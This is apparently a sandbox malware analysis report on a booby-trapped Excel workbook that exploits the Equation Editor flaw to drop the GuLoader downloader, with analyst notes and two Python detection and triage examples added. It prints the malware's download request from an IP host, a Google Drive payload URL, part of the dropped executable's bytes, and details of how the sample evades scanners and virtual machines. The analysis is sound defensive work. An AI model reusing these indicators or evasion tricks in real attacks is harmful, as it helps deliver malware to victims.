Windows Analysis Report Order Request for Quotation.xlsx

Overview

General Information

Sample Name: Order Request for Quotation.xlsx
Analysis ID: 451298
MD5: 180907e797d9f4abe57d016b3a4a0da4
SHA1: 516bd547d90c8f4ae96c1d828908f3264012937b
SHA256: be589141d3e75f2d8b269dcca0afac7d30d6e2d10d376bb9fdd6236d164b7594
Tags: VelvetSweatshop, xlsx

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected GuLoader
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Drops PE files to the user root directory
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection:

Found malware configuration
Source: 00000006.00000002.2362099222.00000000003D0000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1OPtVT-x7\"[OfT"}
Machine Learning detection for dropped file
Source: C:\Users\Public\vbc.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Joe Sandbox ML: detected

Exploits:

Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Note: the report does not distinguish between the two Equation Editor bugs; both end the same way, with EQNEDT32.EXE running attacker-controlled code that downloads and launches a file. The parent of EQNEDT32.EXE is reported as unknown because Office starts it through DCOM (hence the -Embedding switch) rather than as a child of EXCEL.EXE, which is why detection has to key on EQNEDT32.EXE itself and not on an Excel-to-child relationship. Microsoft removed the component from Office in the January 2018 updates; a host that still carries EQNEDT32.EXE (here Office 2010, Office14) remains exploitable by this class of document.
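The Sigma hits listed under Signatures (Droppers Exploiting CVE-2017-11882, EQNEDT32.EXE connecting to internet, File Dropped By EQNEDT32EXE, Execution from Suspicious Folder) all rest on one observation: EQNEDT32.EXE has no legitimate reason to spawn children, open sockets or write executables. The following is an added example, not part of the Joe Sandbox report and not the Sigma rules themselves: a minimal detector run over constructed Sysmon-style events whose field names follow Sysmon event IDs 1, 3 and 11 (Image, ParentImage, TargetFilename, DestinationIp). The events and the suspicious-folder list are our own, modelled on the process tree and traffic shown in this report.

```python
"""Flag Equation Editor abuse in Sysmon-style process/network/file telemetry.

Added example, not from the sandbox report or from the Sigma rules it
cites.  The events below are constructed from the report's process tree
and network section; field names follow Sysmon event IDs 1 (process
create), 3 (network connect) and 11 (file create), but nothing here
depends on Sysmon itself.
"""
import ntpath

EQNEDT = "eqnedt32.exe"

# User-writable folders that legitimate software rarely executes from.
# Our own list for this example, not the Sigma rule's.
SUSPICIOUS_DIRS = (
    "c:\\users\\public\\",
    "\\appdata\\local\\temp\\",
    "\\temporary internet files\\",
)


def _base(path):
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return ntpath.basename(path).lower()


def classify(event):
    """Return the alert names one event triggers (empty list if benign)."""
    alerts = []
    eid = event["EventID"]
    image = event.get("Image", "").lower()
    parent = event.get("ParentImage", "").lower()

    if eid == 1 and _base(parent) == EQNEDT:
        # EQNEDT32.EXE never spawns children on its own: CVE-2017-11882 /
        # CVE-2018-0802 style exploitation.
        alerts.append("eqnedt32_spawns_process")
        if any(d in image for d in SUSPICIOUS_DIRS):
            alerts.append("execution_from_suspicious_folder")
    elif eid == 3 and _base(image) == EQNEDT:
        alerts.append("eqnedt32_network_connection")
    elif eid == 11 and _base(image) == EQNEDT:
        target = event.get("TargetFilename", "").lower()
        if target.endswith((".exe", ".dll", ".scr")):
            alerts.append("eqnedt32_drops_pe")
    return alerts


def scan(events):
    """Map alert name -> indices of the events that raised it."""
    hits = {}
    for i, ev in enumerate(events):
        for name in classify(ev):
            hits.setdefault(name, []).append(i)
    return hits


EQN = "C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE"

# Constructed events mirroring the report; not captured logs.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": "C:\\Program Files\\Microsoft Office\\Office14\\EXCEL.EXE",
     "ParentImage": "C:\\Windows\\explorer.exe"},
    # Equation Editor is started by DCOM, so its parent is svchost, not Excel.
    {"EventID": 1, "Image": EQN, "ParentImage": "C:\\Windows\\System32\\svchost.exe"},
    {"EventID": 3, "Image": EQN, "DestinationIp": "198.12.91.134", "DestinationPort": 80},
    {"EventID": 11, "Image": EQN, "TargetFilename": "C:\\Users\\Public\\vbc.exe"},
    {"EventID": 1, "Image": "C:\\Users\\Public\\vbc.exe", "ParentImage": EQN},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\notepad.exe",
     "ParentImage": "C:\\Windows\\explorer.exe"},   # benign control
]

if __name__ == "__main__":
    for name, idx in sorted(scan(SAMPLE_EVENTS).items()):
        print(f"{name:34s} -> events {idx}")
```

The second constructed event is the one people get wrong: because Equation Editor is launched by DCOM, an "Excel spawns EQNEDT32.EXE" rule never fires, and the rule has to look at EQNEDT32.EXE as the parent, the connecting image, or the writing image, exactly as the Sigma rules named in this report do.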

Software Vulnerabilities:

Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 198.12.91.134:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 198.12.91.134:80
Source: excel.exe Memory has grown: Private usage: 4MB later: 71MB

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://drive.google.com/uc?export=download&id=1OPtVT-x7"[OfT
Note: the Google Drive file ID is partially garbled as printed by the extractor, and no connection to drive.google.com appears anywhere in the captured traffic; the run resolved no domain names at all (the classification label ends in @0/1: zero domains, one IP). The only network activity observed is the first-stage download of vbc.exe from 198.12.91.134. The Drive URL is where the GuLoader stage would fetch its encrypted payload, and that fetch did not happen in this run; the anti-analysis checks listed under Malware Analysis System Evasion are the likely reason.
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected:
  HTTP/1.1 200 OK
  Date: Tue, 20 Jul 2021 12:02:40 GMT
  Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
  Last-Modified: Tue, 20 Jul 2021 09:26:12 GMT
  ETag: "1d000-5c78aa51b4a66"
  Accept-Ranges: bytes
  Content-Length: 118784
  Keep-Alive: timeout=5, max=100
  Connection: Keep-Alive
  Content-Type: application/x-msdownload
Note: Content-Length 118784 is 0x1D000, matching the size field Apache puts at the front of the ETag, so the 118784-byte body below is the complete file. The body is a PE32 image (MZ stub, "PE\0\0", machine 0x014C = i386, three sections .text/.data/.rsrc, linker version 6.0) whose only import name visible in the dump is MSVBVM60.DLL, i.e. a Visual Basic 6 executable, consistent with GuLoader's VB6 outer layer.
Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8b 23 c4 db cf 42 aa 88 cf 42 aa 88 cf 42 aa 88 4c 5e a4 88 ce 42 aa 88 80 60 a3 88 cd 42 aa 88 f9 64 a7 88 ce 42 aa 88 52 69 63 68 cf 42 aa 88 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 e6 21 01 51 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 40 01 00 00 90 00 00 00 00 00 00 28 11 00 00 00 10 00 00 00 50 01 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 e0 01 00 00 10 00 00 38 e2 01 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 44 4b 01 00 28 00 00 00 00 70 01 00 6a 6d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 90 3d 01 00 00 10 00 00 00 40 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 5c 11 00 00 00 50 01 00 00 10 00 00 00 50 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 6a 6d 00 00 00 70 01 00 00 70 00 00 00 60 01 00 00 00 00 00 00 00 00 00 00 
00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected:
  GET /hkcmd/vbc.exe HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: 198.12.91.134
  Connection: Keep-Alive
Note: this is the WinINet default User-Agent of the analysis machine, not a string chosen by the malware: the exploit shellcode uses a URLDownloadToFile-style API, which is also why the download first lands in the IE cache as Content.IE5\ZAE7RW1P\vbc[1].exe before being copied to C:\Users\Public\vbc.exe. The Host header is a bare IP, so no DNS query precedes the connection.
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.134 (this line is repeated 50 times in the report; the first stage connects to a literal IP, so no DNS lookup ever occurs)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3938F7BB.emf
Source: 3938F7BB.emf.0.dr String found in binary or memory: http://www.day.com/dam/1.0

System Summary:

Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Abnormal high CPU Usage
Source: C:\Users\Public\vbc.exe Process Stats: CPU usage > 98%
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write
Contains functionality to call native functions
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D55D9 NtAllocateVirtualMemory, 6_2_003D55D9
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D57A7 NtAllocateVirtualMemory, 6_2_003D57A7
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 6_2_00401128 6_2_00401128
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D55D9 6_2_003D55D9
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D3063 6_2_003D3063
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D20EB 6_2_003D20EB
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D7923 6_2_003D7923
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D2114 6_2_003D2114
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D3917 6_2_003D3917
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D0974 6_2_003D0974
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D8167 6_2_003D8167
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D09EF 6_2_003D09EF
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D4233 6_2_003D4233
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D1262 6_2_003D1262
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D22A3 6_2_003D22A3
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D82CB 6_2_003D82CB
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D330A 6_2_003D330A
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D1CBD 6_2_003D1CBD
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D54BA 6_2_003D54BA
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D0CA7 6_2_003D0CA7
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D34EA 6_2_003D34EA
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D2531 6_2_003D2531
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D8501 6_2_003D8501
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D854C 6_2_003D854C
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D26CF 6_2_003D26CF
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D6F7F 6_2_003D6F7F
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D379D 6_2_003D379D
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D0F9F 6_2_003D0F9F
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D0FFE 6_2_003D0FFE
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D37D8 6_2_003D37D8
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: Order Request for Quotation.xlsx OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Note: expected for a password-encrypted OOXML file. The outer container is OLE2, but it holds only the EncryptionInfo and EncryptedPackage streams; the real workbook (the zip) lives inside EncryptedPackage, so none of the usual Word/Excel/PowerPoint/Visio streams are visible to a static scanner.
PE file contains strange resources
Source: vbc[1].exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc[1].exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@4/13@0/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$Order Request for Quotation.xlsx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRE6F4.tmp
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll (the VB6 runtime; GuLoader's outer layer is a Visual Basic 6 executable)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts (2 occurrences)
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: Order Request for Quotation.xlsx Static file information: File size 1174528 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Order Request for Quotation.xlsx Initial sample: OLE indicators vbamacros = False
Source: Order Request for Quotation.xlsx Initial sample: OLE indicators encrypted = True
Note: "encrypted = True" with no macros is the VelvetSweatshop pattern behind the sample's tag. Excel tries that built-in default password silently before it ever prompts, so the workbook opens with no user interaction, while the embedded object that brings up EQNEDT32.EXE sits inside the encrypted package and is invisible to static scanners that do not try the default password. The file size above the 1 MiB mark is also worth noting: the padding keeps the sample out of size-bounded scanning.
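The three static findings on this sample (encrypted = True, no Word/Excel OLE streams, and, under Boot Survival, an EncryptedPackage stream with entropy 7.998) describe one thing: an OOXML workbook wrapped in the OLE2 encryption container, which Excel opens silently when the password is its built-in default VelvetSweatshop. The following added example is ours, not the sandbox's or any vendor's code. It classifies a file by container magic, looks for the EncryptedPackage and EncryptionInfo directory entries by a raw UTF-16LE search (OLE2 stores stream names that way, so this is enough for triage without a full compound-file parser), measures entropy the way the report does, and shows how to hand the file to msoffcrypto-tool with the default password, which is the next step an analyst takes. Both sample byte strings are constructed stand-ins, not the real document.

```python
"""Triage an .xlsx that is really an encrypted OLE2 container.

Added example.  SAMPLE_PLAIN_OOXML and SAMPLE_ENCRYPTED are constructed
stand-ins, not bytes from the analysed document: they carry only the
container magic and, for the encrypted case, the UTF-16LE stream names
that an OLE2 directory would contain.
"""
import math
from collections import Counter

CFB_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # OLE2 / Compound File Binary
ZIP_MAGIC = b"PK\x03\x04"                           # genuine OOXML is a zip
ENCRYPTED_PACKAGE = "EncryptedPackage".encode("utf-16-le")
ENCRYPTION_INFO = "EncryptionInfo".encode("utf-16-le")
DEFAULT_PASSWORD = "VelvetSweatshop"               # Excel's silent default


def shannon_entropy(data):
    """Bits per byte; 8.0 is the ceiling, ciphertext sits just under it."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def classify_xlsx(data):
    """Return 'ooxml', 'cfb-encrypted', 'cfb-plain' or 'unknown'."""
    if data.startswith(ZIP_MAGIC):
        return "ooxml"
    if data.startswith(CFB_MAGIC):
        if ENCRYPTED_PACKAGE in data and ENCRYPTION_INFO in data:
            return "cfb-encrypted"
        return "cfb-plain"          # legacy .xls or something pretending to be one
    return "unknown"


def triage(name, data):
    """What an analyst needs to know before opening the file anywhere."""
    kind = classify_xlsx(data)
    return {
        "name": name,
        "container": kind,
        "entropy": round(shannon_entropy(data), 3),
        # Extension says OOXML, bytes say OLE2 with an encrypted package:
        # almost always the VelvetSweatshop trick.
        "try_default_password": kind == "cfb-encrypted" and name.lower().endswith(".xlsx"),
    }


def decrypt_with_default_password(path, out_path):
    """Decrypt with msoffcrypto-tool (pip install msoffcrypto-tool).

    Not exercised by the inline samples: it needs a real encrypted file.
    """
    import msoffcrypto                                 # third-party package
    with open(path, "rb") as f, open(out_path, "wb") as out:
        office = msoffcrypto.OfficeFile(f)
        office.load_key(password=DEFAULT_PASSWORD)
        office.decrypt(out)


# Constructed stand-ins (not the real sample bytes).
SAMPLE_PLAIN_OOXML = ZIP_MAGIC + b"\x14\x00\x06\x00" + b"[Content_Types].xml" + b"\x00" * 64
SAMPLE_ENCRYPTED = (
    CFB_MAGIC + b"\x00" * 16
    + ENCRYPTION_INFO + b"\x00" * 8
    + ENCRYPTED_PACKAGE + b"\x00" * 8
    + bytes(range(256)) * 4                            # stand-in for high-entropy ciphertext
)

if __name__ == "__main__":
    for name, blob in (("quote.xlsx", SAMPLE_PLAIN_OOXML),
                       ("Order Request for Quotation.xlsx", SAMPLE_ENCRYPTED)):
        print(triage(name, blob))
```

The raw byte search is a triage shortcut; for anything that has to be exact, parse the directory with olefile (oletools' oleid reports the same encrypted flag). Once the package is decrypted with the default password, the usual OOXML checks (embedded OLE objects, external relationships, macros) apply to the inner zip.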

Data Obfuscation:

Yara detected GuLoader
Source: Yara match File source: 00000006.00000002.2362099222.00000000003D0000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 6_2_00401128 push esi; retn 4D4Dh 6_2_0040263F
Source: C:\Users\Public\vbc.exe Code function: 6_2_00404916 push 00000014h; ret 6_2_00404938
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D383F push ebx; iretd 6_2_003D384A
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D3837 push ebx; iretd 6_2_003D383E
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D0837 push ebx; iretd 6_2_003D0842
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D6837 push ebx; iretd 6_2_003D6842
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D7037 push ebx; iretd 6_2_003D7042
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D7837 push ebx; iretd 6_2_003D7842
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D5033 push ebx; iretd 6_2_003D503E
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D082B push ebx; iretd 6_2_003D0836
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D682B push ebx; iretd 6_2_003D6836
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D702B push ebx; iretd 6_2_003D7036
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D782B push ebx; iretd 6_2_003D7836
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D802A push esp; iretd 6_2_003D98BA
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D5027 push ebx; iretd 6_2_003D5032
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D081F push ebx; iretd 6_2_003D082A
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D681F push ebx; iretd 6_2_003D682A
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D701F push ebx; iretd 6_2_003D702A
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D781F push ebx; iretd 6_2_003D782A
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D501B push ebx; iretd 6_2_003D5026
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D0813 push ebx; iretd 6_2_003D081E
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D6813 push ebx; iretd 6_2_003D681E
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D7013 push ebx; iretd 6_2_003D701E
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D7813 push ebx; iretd 6_2_003D781E
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D500F push ebx; iretd 6_2_003D501A
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D0807 push ebx; iretd 6_2_003D0812
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D6807 push ebx; iretd 6_2_003D6812
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D7007 push ebx; iretd 6_2_003D7012
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D7807 push ebx; iretd 6_2_003D7812
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D5003 push ebx; iretd 6_2_003D500E
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D107F push ebx; iretd 6_2_003D108A
Source: initial sample Static PE information: section name: .text entropy: 6.90665747983 (listed twice)

Persistence and Installation Behavior:

Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe

Boot Survival:

Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX (9 occurrences)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX (8 occurrences)
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: Order Request for Quotation.xlsx Stream path 'EncryptedPackage' entropy: 7.99848190617 (max. 8.0)
Note: entropy this close to 8.0 over the EncryptedPackage stream is simply what correctly encrypted data looks like; it says nothing about packing or obfuscation of the workbook itself. Decrypt the container with the default password first, then re-run the static checks on the inner OOXML.

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D3917 6_2_003D3917
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D8167 6_2_003D8167
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D6F7F 6_2_003D6F7F
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D379D 6_2_003D379D
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D37D8 6_2_003D37D8
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000003D928F second address: 00000000003D928F instructions:
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000003D9277 second address: 00000000003D928F instructions:
  0x00000000 rdtsc
  0x00000002 popad
  0x00000003 xor ecx, AF55D2FDh
  0x00000009 mov dword ptr [edi+ecx], eax
  0x0000000c mov ecx, C83BC8F2h
  0x00000011 xor ecx, 51282A31h
  0x00000017 pushad
  0x00000018 rdtsc
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000003D928F second address: 00000000003D928F instructions:
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D3063 rdtsc 6_2_003D3063
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2220 Thread sleep time: -360000s >= -30000s
